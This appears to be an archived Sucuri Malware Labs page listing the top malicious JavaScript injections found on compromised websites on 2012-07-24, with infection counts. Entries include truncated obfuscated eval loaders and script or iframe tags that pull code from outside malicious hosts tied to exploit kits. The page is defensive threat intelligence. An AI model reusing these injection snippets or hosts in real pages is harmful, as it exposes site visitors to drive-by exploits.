Sucuri Malware Labs
Historic malware entries for 2012-07-24Home | Notes | Malware data | Signatures | Tools | About
Archived data: Latest | 2013-05-19 | 2013-05-15 | 2013-05-14 | 2013-05-13 | 2013-05-12 | 2013-05-07 | 2013-05-02 | 2013-05-01 | More daysWe separate the data in three categories: Iframes, redirectiors and javascript. For each one you can click on the domain for more information, IP addresses and details on the malware.
Hidden iframes
Latest hidden iframes our scanner have identified on compromised web sites.
Conditional redirections
Conditional redirections we have detected (based on user agents or referers).
Encoded javascript
Encoded javascript (redirecting to blackhole and other exploit kits) or to build a remote call.
| # of sites infected | Type | Malware / Domains |
|---|---|---|
| 256 | javascript | <script>try{eval("pro"+"totype")>0;}catch(zxc){e=eval;n="117..100..918..1170..990..990..1044..1... |
| 156 | javascript | <script type="text/javascript">document.write('<iframe src="http://rec-creations.com/adv.php" n... |
| 45 | javascript | <script>s="";try{q=document.createElement("p");a=(q)?"appendChild":12;q[a]("123"+n);}catch(qw){... |
| 39 | javascript | <script type="text/javascript" src="http://aeg.com.br/us/Check.php"></script> |
| 33 | javascript | <script>try{eval("pro"+"totype")>0;}catch(zxc){e=eval;n="117..100..900..1110..891..1170..981..1... |
| 29 | javascript | <script>try{eval("pro"+"totype")>0;}catch(zxc){e=eval;n="117..100..918..1170..990..990..1044..1... |
| 26 | javascript | <script>try{n-=eval("p"+"rototype");}catch(zxc){e=eval;n="81..90..945..1020..288..400..900..111... |
| 23 | javascript | <script>try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;try{prototype... |
| 20 | javascript | <script type="text/javascript">document.write('<iframe src="http://rolyjyl.ru/count30.php" name... |
| 20 | javascript | <script>i=0;try{prototype;}catch(z){h="harCode";f=['-33c-33c63c60c-10c-2c58c69c57c75c67c59c68c7... |
| 20 | javascript | <script>eval(String.fromCharCode(102,117,110,99,116,105,111,110,32,103,101,116,95,100,111,109,9... |
| 18 | javascript | <script type="text/javascript" language="javascript" src="http://earnforum.net//styles/DVGFX2/c... |
| 18 | javascript | <script type="text/javascript" language="javascript" src="http://baykalmotorshow.ru//admin/jque... |
| 18 | javascript | <script src="http://sweepstakesandcontestsnow.com/nl.php?nnn=1"></script> |
| 16 | javascript | <script>try{eval("pro"+"totype")>0;}catch(zxc){e=eval;n="81..90..945..1020..288..400..900..1110... |
| 16 | javascript | <script>try{12+prototype;}catch(zxc){e=window["eva"+"l"];n="81.90.945.1020.288.400.900.1110.891... |
| 15 | javascript | <script type="text/javascript" language="javascript" src="http://buitengewoon-oss.nl//_vti_log/... |
| 15 | javascript | <script src="http://naked-adsl.co.za.tempurlza.co.cc/wp-content/themes/twentyeleven/js/html5.js... |
| 13 | javascript | <script>try{eval("pro"+"totype")>0;}catch(zxc){e=eval;n="81..90..945..1020..288..400..900..1110... |
| 13 | javascript | <script>try{1-prototype;}catch(asd){x=2;} if(x){f=[0,-1,94,93,22,29,91,101,88,108,99,90,101,106... |
| 12 | javascript | <script>try{eval("pro"+"totype")>0;}catch(zxc){e=eval;n="81..90..945..1020..288..400..900..1110... |
| 11 | javascript | <script type="text/javascript" src="http://andws.com.br/ti/Check.php"></script> |
| 11 | javascript | <script language="Javascript" SRC="http://recreativ.ru/tizers.php?sid=779&bn=Y6cU2wvofd&cat=45"... |
| 10 | javascript | <script src="http://ort40ruck.rr.nu/pmg.php?d=x"></script> |
| 10 | javascript | <script src="http://origi75nalund.rr.nu/pmg.php?d=x"></script> |
| 10 | javascript | <script src=http://jorgealcidesbuffa.com/Resguardos/test.php ></script> |
| 8 | javascript | <script type="text/javascript" src="http://asjo.com.br/js/Check.php"></script> |
| 8 | javascript | <script>try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;try{bcsd=prot... |
| 8 | javascript | <script>try{n-=eval("p"+"rototype");}catch(zxc){e=eval;n="117..100..918..1170..990..990..1044..... |
| 7 | javascript | <script type="text/javascript" src="http://jsfeedget.com/js.php"></script> |
| 7 | javascript | <script type="text/javascript" src="http://gostats.ru/js/counter.js"></script> |
| 7 | javascript | <script type="text/javascript" language="javascript" src="/dd" ></script> |
| 7 | javascript | <script src="http://vepl26asmad.rr.nu/pmg.php?d=x"></script> |
| 7 | javascript | <script src="http://quitie30sbehavi.rr.nu/pmg.php?d=x"></script> |
| 7 | javascript | <script src="http://onsh13ipwo.rr.nu/pmg.php?d=x"></script> |
| 7 | javascript | <script src="http://dmin19istra.rr.nu/pmg.php?d=x"></script> |
| 7 | javascript | <script src="http://alsu33rpris.rr.nu/pmg.php?d=x"></script> |
| 6 | javascript | <script type="text/javascript">var vbsp='D4065D32';eval(function(p,a,c,k,e,d){e=function(c){ret... |
| 6 | javascript | <script>try{q=document.createElement("u");q.appendChild(q+"");}catch(qw){h=-012/5;zz='a'+'l';f=... |
| 6 | javascript | <script>try{eval("pro"+"totype")>0;}catch(zxc){e=eval;n="81..90..945..1020..288..400..900..1110... |
| Limited view (40 rows)... Only the top entries being displayed. |